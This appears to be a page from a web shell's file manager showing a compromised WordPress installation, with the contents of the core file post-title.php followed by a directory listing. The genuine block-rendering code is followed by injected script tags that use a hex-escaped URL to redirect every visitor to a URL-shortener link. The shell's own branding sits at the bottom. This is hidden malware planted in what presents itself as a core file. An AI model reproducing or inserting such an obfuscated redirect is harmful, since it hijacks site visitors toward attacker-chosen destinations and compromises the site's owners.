Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
starmediamw.com
/
wp-includes
/
blocks
/
File Content:
post-title.php
<?php /** * Server-side rendering of the `core/post-title` block. * * @package WordPress */ /** * Renders the `core/post-title` block on the server. * * @since 6.3.0 Omitting the $post argument from the `get_the_title`. * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * * @return string Returns the filtered post title for the current post wrapped inside "h1" tags. */ function render_block_core_post_title( $attributes, $content, $block ) { if ( ! isset( $block->context['postId'] ) ) { return ''; } /** * The `$post` argument is intentionally omitted so that changes are reflected when previewing a post. * See: https://github.com/WordPress/gutenberg/pull/37622#issuecomment-1000932816. */ $title = get_the_title(); if ( ! $title ) { return ''; } $tag_name = 'h2'; if ( isset( $attributes['level'] ) ) { $tag_name = 0 === $attributes['level'] ? 'p' : 'h' . (int) $attributes['level']; } if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) { $rel = ! empty( $attributes['rel'] ) ? 'rel="' . esc_attr( $attributes['rel'] ) . '"' : ''; $title = sprintf( '<a href="%1$s" target="%2$s" %3$s>%4$s</a>', esc_url( get_the_permalink( $block->context['postId'] ) ), esc_attr( $attributes['linkTarget'] ), $rel, $title ); } $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); return sprintf( '<%1$s %2$s>%3$s</%1$s>', $tag_name, $wrapper_attributes, $title ); } /** * Registers the `core/post-title` block on the server. * * @since 5.8.0 */ function register_block_core_post_title() { register_block_type_from_metadata( __DIR__ . '/post-title', array( 'render_callback' => 'render_block_core_post_title', ) ); } add_action( 'init', 'register_block_core_post_title' ); ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Submit
FILE
FOLDER
Name
Size
Permission
Action
archives
---
0755
audio
---
0755
avatar
---
0755
block
---
0755
button
---
0755
buttons
---
0755
calendar
---
0755
categories
---
0755
code
---
0755
column
---
0755
columns
---
0755
comment-author-name
---
0755
comment-content
---
0755
comment-date
---
0755
comment-edit-link
---
0755
comment-reply-link
---
0755
comment-template
---
0755
comments
---
0755
comments-pagination
---
0755
comments-pagination-next
---
0755
comments-pagination-numbers
---
0755
comments-pagination-previous
---
0755
comments-title
---
0755
cover
---
0755
details
---
0755
embed
---
0755
file
---
0555
footnotes
---
0755
freeform
---
0755
gallery
---
0755
group
---
0755
heading
---
0755
home-link
---
0755
html
---
0755
image
---
0555
latest-comments
---
0755
latest-posts
---
0755
legacy-widget
---
0755
list
---
0755
list-item
---
0755
loginout
---
0755
media-text
---
0755
missing
---
0755
more
---
0755
navigation
---
0555
navigation-link
---
0755
navigation-submenu
---
0755
nextpage
---
0755
page-list
---
0755
page-list-item
---
0755
paragraph
---
0755
pattern
---
0755
post-author
---
0755
post-author-biography
---
0755
post-author-name
---
0755
post-comments-form
---
0755
post-content
---
0755
post-date
---
0755
post-excerpt
---
0755
post-featured-image
---
0755
post-navigation-link
---
0755
post-template
---
0755
post-terms
---
0755
post-title
---
0755
preformatted
---
0755
pullquote
---
0755
query
---
0555
query-no-results
---
0755
query-pagination
---
0755
query-pagination-next
---
0755
query-pagination-numbers
---
0755
query-pagination-previous
---
0755
query-title
---
0755
quote
---
0755
read-more
---
0755
rss
---
0755
search
---
0555
separator
---
0755
shortcode
---
0755
site-logo
---
0755
site-tagline
---
0755
site-title
---
0755
social-link
---
0755
social-links
---
0755
spacer
---
0755
table
---
0755
tag-cloud
---
0755
template-part
---
0755
term-description
---
0755
text-columns
---
0755
verse
---
0755
video
---
0755
widget-group
---
0755
admin.php
5362 bytes
0644
archives.php
3680 bytes
0644
avatar.php
6431 bytes
0644
block.php
3888 bytes
0644
blocks-json.php
187913 bytes
0644
button.php
2491 bytes
0644
calendar.php
6761 bytes
0644
categories.php
4696 bytes
0644
comment-author-name.php
2819 bytes
0644
comment-content.php
3145 bytes
0644
comment-date.php
2549 bytes
0644
comment-edit-link.php
2399 bytes
0644
comment-reply-link.php
2761 bytes
0644
comment-template.php
5180 bytes
0644
comments-pagination-next.php
2610 bytes
0644
comments-pagination-numbers.php
2318 bytes
0644
comments-pagination-previous.php
2476 bytes
0644
comments-pagination.php
1885 bytes
0644
comments-title.php
3458 bytes
0644
comments.php
7453 bytes
0644
cover.php
3795 bytes
0644
file.php
2479 bytes
0644
footnotes.php
4457 bytes
0644
gallery.php
7124 bytes
0644
heading.php
1987 bytes
0644
home-link.php
6419 bytes
0644
image.php
12785 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
latest-comments.php
5726 bytes
0644
latest-posts.php
9228 bytes
0644
legacy-widget.php
4683 bytes
0644
list.php
1959 bytes
0644
loginout.php
2104 bytes
0644
media-text.php
5069 bytes
0644
navigation-link.php
14211 bytes
0644
navigation-submenu.php
9991 bytes
0644
navigation.php
59994 bytes
0644
page-list-item.php
1047 bytes
0644
page-list.php
14297 bytes
0644
pattern.php
2874 bytes
0644
post-author-biography.php
2210 bytes
0644
post-author-name.php
2508 bytes
0644
post-author.php
3291 bytes
0644
post-comments-form.php
3491 bytes
0644
post-content.php
2842 bytes
0644
post-date.php
3810 bytes
0644
post-excerpt.php
4133 bytes
0644
post-featured-image.php
10049 bytes
0644
post-navigation-link.php
5523 bytes
0644
post-template.php
6435 bytes
0644
post-terms.php
4377 bytes
0644
post-title.php
2824 bytes
0644
query-no-results.php
2533 bytes
0644
query-pagination-next.php
4473 bytes
0644
query-pagination-numbers.php
5456 bytes
0644
query-pagination-previous.php
3859 bytes
0644
query-pagination.php
1862 bytes
0644
query-title.php
2784 bytes
0644
query.php
6377 bytes
0644
read-more.php
2516 bytes
0644
require-dynamic-blocks.php
4791 bytes
0644
require-static-blocks.php
1187 bytes
0644
rss.php
4654 bytes
0644
search.php
23736 bytes
0644
shortcode.php
1421 bytes
0644
site-logo.php
7020 bytes
0644
site-tagline.php
1889 bytes
0644
site-title.php
2495 bytes
0644
social-link.php
64857 bytes
0644
tag-cloud.php
2276 bytes
0644
template-part.php
10786 bytes
0644
term-description.php
2022 bytes
0644
widget-group.php
3124 bytes
0644
N4ST4R_ID | Naxtarrr